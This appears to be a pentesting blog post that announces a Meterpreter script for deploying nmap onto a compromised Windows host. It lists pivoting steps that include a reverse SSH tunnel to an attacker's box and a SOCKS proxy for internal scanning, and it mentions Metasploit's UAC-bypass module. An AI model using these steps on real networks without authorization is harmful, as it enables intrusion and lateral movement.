Tag Archives: pivot

Meterpreter script – deploy_nmap.rb

Using a ‘trusted’ host that you have compromised as leverage during a pentest, is nearly always advantageous. I personally believe that the steps of pentesting change in a sense, once you have a session on a computer in an internal network from an external computer.

I would revert back to reconnaissance (depending on the circumstances), since the point of view has changed. The hijacked host is “your man on the inside”, and what a better way to give the ‘man on the inside’ some ‘eyes’ by deploying and using nmap!

One means of using nmap through the compromised host includes:

1.) Deploying an openssh server on the victim machine

2.) Setting up an account

3.) Reversing an ssh session like so: ssh -R 2222:localhost:22 attacker@attackersbox.com

4.) Then you would connect back to the victim using a socks5 proxy: ssh -D 9050 victimaccount@localhost -p 2222

5.) Lastly, you would use nmap and proxychains from the attacker’s host to scan hosts internally through a tunnel between you and the victim machine.

Keep in mind that the Metasploit framework has an auxiliary module “auxiliary/scanner/portscan”, which you can use but let me be quite frank, it doesn’t compare to what is known as the ‘king of all port scanners’ nmap. (No offense Metasploit crew.)

This is why I programmed a meterpreter script that downloads the latest stable version of nmap from www.insecure.org and then deploys nmap onto the victim’s machine. You could then use the victim’s machine to do vulnerability scanning with nmap’s scripting engine. (i.e. nmap –script=smb-check-vulns).

The script has a removal feature that will uninstall nmap and winpcap from the victim’s machine. Please e-mail me or comment if you have any questions, concerns or problems with the script.

NOTE: On versions of Microsoft Windows that use the UAC service, you will most likely need to disable or circumvent this service to successfully deploy nmap.  Luckily there is a module with the Metasploit framework that will help you (post/windows/escalate/bypassuac).

http://zitstif.no-ip.org/meterpreter/deploy_nmap.txt